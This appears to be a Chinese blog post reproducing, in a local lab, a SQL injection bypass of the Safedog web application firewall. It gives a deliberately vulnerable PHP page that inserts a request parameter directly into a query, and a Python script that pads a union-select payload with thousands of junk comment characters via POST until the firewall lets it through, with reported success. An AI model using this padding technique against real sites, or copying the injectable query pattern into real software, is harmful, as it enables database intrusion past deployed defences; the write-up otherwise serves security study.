美文网首页渗透测试
sql注入绕过安全狗waf

sql注入绕过安全狗waf

作者: littlebin404 | 来源:发表于2019-11-15 17:43 被阅读0次

看了某个师傅sql注入绕过安全狗waf的文章,自己搭建平台重现一番。

环境部署

安装phpstudy:

安全狗关闭CC:

靶机代码和POC

创建test数据库:

靶机代码:

<?php

$db_host = 'localhost';

$db_name = 'root';

$db_user = 'root';

$db_pwd = '123456';

//面向对象方式

$mysqli = new mysqli($db_host, $db_user, $db_pwd);

//面向对象的昂视屏蔽了连接产生的错误,需要通过函数来判断

if(mysqli_connect_error()){

    echo mysqli_connect_error();

}

//设置编码

$mysqli->set_charset("utf8");//或者 $mysqli->query("set names 'utf8'")

echo "连接成功";

mysqli_select_db($mysqli,'test');

$id=$_REQUEST['id'];

$query="SELECT * FROM users WHERE id =$id";

$result=mysqli_query($mysqli,$query);

while($row=mysqli_fetch_array($result,MYSQLI_NUM))

{

echo $row[0]." ".$row[1];

echo "<br />";

}

echo "<br />";

echo $query;

//关闭连接

$mysqli->close();

?>

访问:localhost/sql.php?id=1

经测试发现常规的注入方式会被拦截

因为对于软waf,如果提交的数据量过多。就会直接扔到后端去处理

get不能提交过多的数据,所以用post写了个简单的python脚本,通过叠加无用的字符,并检测是否绕过waf,我们的payload  1 /*无用的字符*/  union select user(),2

附上poc代码:

import requests

url = "http://localhost/sql.php"

headers = {

    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0"

}

try:

    for i in range(1,2999):

        st = "/*"+"ABC"*i+"*/ union select user(),2"

        data={

             "id":"1 %s " %st

            }

        print(i)

        res= requests.post(url,headers=headers,data=data).text

        print(data)

        print(res)

        if res.find("cax")!=-1:

            print(i)

            break

except:

print('终止执行')

运行结果:

在ABC*2562的时候成功了绕过了安全狗结果。

绕过成功!!!

如果没有绕过狗的res的内容:

将payload放在burp上验证下:

这里的burp注意是post请求方式,可以通过抓包抓到get请求的包放到Repeat下,然后右键change request method来更改成post请求:

直接使用ABC*2562这个payload对于返回的请求包如果是500error或者internet server error当时以为是我的服务配置问题,没想到再加几十个ABC进去后,就绕过了waf

相关文章

  • sql注入绕过安全狗waf

    看了某个师傅sql注入绕过安全狗waf的文章,自己搭建平台重现一番。 环境部署 安装phpstudy: 安全狗关闭...

  • 绕过waf方法

    参考:绕过WAF、安全狗知识整理 - 珍惜少年时 - 博客园 SQL注入 | 9种绕过Web应用程序防火墙的方式 ...

  • 小迪16期-20170408

    安全狗防护注入及绕过思路Sqlmap tamper插件分析. sql注入绕过思路一:提交方式更改注入sql注入绕过...

  • sql 注入绕过waf

    6.特殊符号 特殊字符是什么?除了字符串和数字都是特殊字符 比如~!@#¥%…………&*()— 乌云的一篇waf绕...

  • Sql 注入 绕过 WAF

    1.大小写绕过 2.替换关键字 3.URL双重编码 4.使用注释 5.同功能的函数替换 6.特殊符号 7.HTTP...

  • [SQL注入]一些绕过WAF的技术

    [SQL注入]一些绕过WAF的技术 本文是在各种方法的WAF的总结,我们可以在测试bypass WAF使用下面的方...

  • 绕过waf进行SQL注入

    转自:https://security.tencent.com/index.php/blog/msg/66 waf...

  • 🎪waf绕过

    ? waf注入绕过检测方法 云waf直接找真实ip就可绕过 方法总结:绕过waf的方法: 1、白名单绕过2、大小写...

  • 11.绕过waf sql注入

    绕过waf的方法:1.白名单、2改变请求方法、3.大小写绕过 、4.url编码绕过、5.组合绕过、6.复参数绕过7...

  • SQL注入&WAF绕过姿势【转载】

    原文链接:https://blog.csdn.net/qq_31481187/article/details/59...

网友评论

    本文标题:sql注入绕过安全狗waf

    本文链接:https://www.haomeiwen.com/subject/luvsictx.html